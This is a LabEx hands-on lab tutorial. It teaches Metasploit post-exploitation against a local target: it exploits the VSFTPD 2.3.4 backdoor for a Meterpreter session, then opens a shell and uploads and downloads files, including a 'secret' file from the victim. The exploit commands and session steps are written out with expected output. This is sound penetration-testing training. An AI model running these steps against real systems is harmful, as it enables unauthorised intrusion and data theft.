LabEx
Log InJoin Free

Metasploit Basic Post-Exploitation

LinuxBeginner
Practice Now

Introduction

In this lab, you will learn the fundamentals of post-exploitation using the Metasploit Framework. First, you will gain initial access by exploiting a vulnerable FTP server to establish a Meterpreter session. Then, you will move into the post-exploitation phase. The goal of this phase is to explore the compromised system, escalate privileges, and exfiltrate data.

You will practice essential Meterpreter commands to interact with a session, execute shell commands, and transfer files between the attacker and victim machines. This lab will guide you from the initial exploit to basic post-exploitation techniques.

Gain Initial Access

In this step, you will gain access to the target system by exploiting a backdoor in the VSFTPD 2.3.4 service. This will give you a Meterpreter session for post-exploitation.

First, launch the Metasploit Framework console.

msfconsole -q

Once Metasploit is running, select the exploit for the VSFTPD 2.3.4 backdoor.

use exploit/unix/ftp/vsftpd_234_backdoor

Now, configure the target and payload options. Since the service is running on the same machine, we use the loopback IP. The default payload requires LHOST and may fail with "All encoders failed to encode" - set the encoder to avoid this:

set RHOSTS 127.0.0.1
set LHOST 127.0.0.1
set Encoder generic/none

Finally, launch the exploit.

exploit

TROUBLESHOOTING: If you see Msf::OptionValidateError One or more options failed to validate: LHOST, run set LHOST 127.0.0.1. If you see All encoders failed to encode, run set Encoder generic/none. Then run exploit again.

WARNING: The first attempt might fail with "Unable to connect to backdoor on 6200/TCP. Cooldown?" or "Exploit completed, but no session was created." If this happens, simply run the exploit command again - the second attempt should succeed.

If successful, a Meterpreter session will be opened (session 1).

[*] Started reverse TCP handler on 127.0.0.1:4444
[!] 127.0.0.1:21 - The port used by the backdoor bind listener is already open. Trying...
[+] 127.0.0.1:21 - Backdoor has been spawned!
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:xxxxx) at ...
meterpreter >

You now have a Meterpreter session. To return to the msf > prompt for the next step, press Ctrl+Z and then y when asked "Background session 1?"

Interact with Meterpreter Session

Now that you have a Meterpreter session in the background, you will learn how to interact with it. The sessions command lists all active sessions and works only at the main Metasploit prompt (msf exploit(...) >), not inside Meterpreter.

To see your active sessions, run:

sessions

You should see your Meterpreter session with ID 1.

Active sessions
===============

  Id  Name  Type                    Information  Connection
  --  ----  ----                    -----------  ----------
  1         meterpreter x86/linux                127.0.0.1:4444 -> 127.0.0.1:xxxxx (127.0.0.1)

To interact with session 1, run:

sessions -i 1

Your prompt will change to meterpreter >, indicating you are now inside the session.

[*] Starting interaction with 1...

meterpreter >

You are now ready to run post-exploitation commands from within Meterpreter.

Run Shell Command with shell Command

From within Meterpreter, you can drop into a standard system shell to run commands on the target. This is useful when you need to execute shell-specific commands or scripts.

At the meterpreter > prompt, type:

shell

A standard shell will open on the remote target. The prompt may seem to hang briefly, but you are now in a system shell and can run commands directly.

Process 1654 created.
Channel 1 created.

Run whoami to confirm your user context:

whoami

labex

Type exit to return to the Meterpreter prompt.

exit

Your prompt will change back to meterpreter >. In the next step, you will use this session to upload a file to the target.

Upload File with upload /local/path /remote/path

Meterpreter's upload command transfers files from your local machine to the target. A file named local_file.txt is in /home/labex/project. Upload it to /tmp on the remote machine.

From the meterpreter > prompt, run:

upload /home/labex/project/local_file.txt /tmp/uploaded_file.txt

You will see output confirming the upload:

[*] Uploading  : /home/labex/project/local_file.txt -> /tmp/uploaded_file.txt
[*] Uploaded -1.00 B of 48.00 B (-2.08%): /home/labex/project/local_file.txt -> /tmp/uploaded_file.txt
[*] Completed  : /home/labex/project/local_file.txt -> /tmp/uploaded_file.txt

In this lab, the target runs on the same machine, so the file appears at /tmp/uploaded_file.txt. Next, you will practice the reverse operation: downloading a file from the target.

Download File with download /remote/path /local/path

The download command transfers files from the target to your local machine. A file named secret_data.txt is in /tmp on the remote system. Download it to your project directory.

From the meterpreter > prompt, run:

download /tmp/secret_data.txt /home/labex/project/downloaded_secret.txt

You will see output confirming the download. Meterpreter may create a directory named downloaded_secret.txt and place the file inside it as secret_data.txt.

[*] Downloading: /tmp/secret_data.txt -> /home/labex/project/downloaded_secret.txt/secret_data.txt
[*] Downloaded 47.00 B of 47.00 B (100.0%): /tmp/secret_data.txt -> /home/labex/project/downloaded_secret.txt/secret_data.txt
[*] Completed  : /tmp/secret_data.txt -> /home/labex/project/downloaded_secret.txt/secret_data.txt

The file is now on your local machine. In the final step, you will close the session and verify the downloaded content.

Exit Session with exit Command

In this final step, you will close the Meterpreter session and exit the Metasploit console.

From the meterpreter > prompt, type exit to close the session.

exit

[*] Shutting down session: 1

[*] 127.0.0.1 - Meterpreter session 1 closed.  Reason: Died

To exit the Metasploit console, type exit. If prompted about an active session, use exit -y to force exit.

exit -y

Verify the downloaded file. As noted earlier, Meterpreter may have created a directory; the file is at downloaded_secret.txt/secret_data.txt:

cat /home/labex/project/downloaded_secret.txt/secret_data.txt

This is a secret file from the victim machine.

Congratulations! You have completed a full exploit and post-exploitation workflow.

Summary

In this lab, you have learned a complete workflow from initial access to post-exploitation. You started by gaining a Meterpreter session via an exploit. You practiced how to list and interact with sessions, gain a standard system shell from Meterpreter, and mastered file transfer between the attacker and victim machines using the upload and download commands. Finally, you learned how to properly close a session and exit the Metasploit console. These skills are fundamental to penetration testing.

Related Linux Courses
Quick Start with Linux

Quick Start with Linux

linux
Become a Junior System Administrator

Become a Junior System Administrator

linuxshell
Linux for Noobs

Linux for Noobs

linux